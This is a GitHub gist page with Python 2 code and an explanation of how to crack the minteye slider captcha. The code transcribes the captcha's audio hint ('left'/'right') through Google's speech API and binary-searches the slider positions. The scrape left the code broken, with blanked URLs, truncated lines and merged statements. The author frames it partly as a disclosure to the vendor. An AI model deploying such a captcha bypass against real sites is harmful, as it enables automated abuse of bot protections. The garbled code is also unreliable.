Create a gist now

Instantly share code, notes, and snippets.

minteye is a captcha system where you try to find the original image out of distorted ones. They also have a feature list on their website but they forgot the view from a computer. I fixed it:

minteye captcha features

There are two ways to crack this captcha easily. I've used the audio challange. There are three different kind of audio messages.

  1. move the slider to the right
  2. move the slider to the left
  3. slider is in the correct position

1 and 2 are very long sentences and 3 is a very short sentence. I've used Google Chromes text2speech API to convert the audio into text. The text I get pack is totally stupid, but it recognizes "left" and "right" which is sufficient to determine the next move of the slider. Here is a small video which shows the code in action:

YouTube Video Demo

minteye should have a look at how reCaptcha obscures the audio. But the problem will always be the small amount of different messages.

kind regards,

personal Website
I'm a member of the Stuttgart Hackerspace - shackspace

edit: to see really cool stuff with reCaptcha, check out what they did:

import httplib, re, urllib2, json, subprocess, StringIO, Tkinter, ImageTk, traceback
from PIL import Image
tmp_folder = 'tmp/'
file_prefix = 'test_'
class Logger():
def __init__(self,level=0):
self.level = level
def log(self,level=1,msg=''):
if self.level>=level:
print '[%d] %s' % (level,msg)
class MinteyeCaptcha:
def __init__(self,CaptchaId='4025',PublicKey='8fce9e8a-dc61-4b04-b2a4-61e9ded571a2',Dummy='random_dummy',DEBUG=0):
self.CaptchaId = CaptchaId
self.PublicKey = PublicKey
self.Dummy = Dummy
self.logging = Logger(DEBUG)
self.apiconn = httplib.HTTPConnection('')
self.logging.log(1,'created MintEye id: '+CaptchaId)
self.SessionId = None
self.cid = None
def initiate(self):
req = self.apiconn.getresponse()
content =
self.cid = re.findall(r'.*Challenge: \'([a-z0-9\-]+)\',.*',content)[0]
self.logging.log(1,'cid: '+self.cid)
headers = req.getheaders()
self.SessionId = re.findall(r'.*ASP.NET_SessionId=([a-z0-9]+);.*',dict(headers)['set-cookie'])[0]
self.logging.log(1,'SessionId: '+self.SessionId)
req = self.apiconn.getresponse()
self.logging.log(1,'clear tmp dir')['rm',tmp_folder+file_prefix+'*'])
def getaudio(self,val=0):
self.logging.log(1,'get audio: '+str(val))
self.Dummy = '1234567'
headers = 'Cookie: ASP.NET_SessionId='+self.SessionId
req = self.apiconn.getresponse()
headers = req.getheaders()
content =
return content
def getimg(self,val=0):
self.logging.log(1,'get image: '+str(val))
req = urllib2.urlopen(''+self.PublicKey+'&w=300&h=250&dumm='+self.Dummy+'&reqid='+self.cid+'&img='+str(val))
content =
return content
def audio2text(self,audio,val=0):
self.logging.log(1,'create .wav file')
f = open(tmp_folder+file_prefix+str(val)+'.wav','wb')
self.logging.log(1,'convert audio .wav to .flac')["ffmpeg", "-i", tmp_folder+file_prefix+str(val)+'.wav', tmp_folder+file_prefix+str(val)+'.flac','-loglevel','quiet','-y'])
f = open(tmp_folder+file_prefix+str(val)+'.flac','rb')
audio =
self.logging.log(1,'audio2text via google')
url = ""
request = urllib2.Request(url)
request.add_header('Content-type','audio/x-flac; rate=8000')
request.add_header('Content-length', str(len(audio)))
response = urllib2.urlopen(request)
content = json.loads(
return content['hypotheses'][0]['utterance']
elf.logging.log(2,'ERROR: audio2text via google')
self.logging.log(2,'ERROR: convert audio .wav to .flac')
self.logging.log(2,'ERROR: create .wav file')
cracker = MinteyeCaptcha(DEBUG=2)
found = False
binary_search = [0,29]
root = Tkinter.Tk()
image, tkpi,label_image = None, None, None
label_image = Tkinter.Label(root)
def next_image(event):
global binary_search, found, cracker, Tkinter, tkpi, label_image, root, image
val = (binary_search[0]+(binary_search[1]-binary_search[0])/2)
print "===== binary search try Image #%d (%d,%d) =====" % (val,binary_search[0],binary_search[1])
root.title('Image #'+str(val))
img = cracker.getimg(val)
image =
root.geometry('%dx%d' % (image.size[0],image.size[1]))
tkpi = ImageTk.PhotoImage(image)
label_image.configure(image = tkpi)
label_image.image = tkpi
audio = cracker.getaudio(val)
text = cracker.audio2text(audio)
print "\nGoogle says:\n%s\n" % text
if len(text)>50:
if "left" in text[0:50]:
binary_search[1] = val
elif "right" in text[0:50]:
binary_search[0] = val
print "error?"
print "\nFound valid Picture #"+str(val)
found = True
root.geometry('+%d+%d' % (300,250))
root.bind("<space>", next_image)
Unknown commented Sep 1, 2014

Doesn't work for the high security level because it uses a different distortion technique. You can see it on .

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment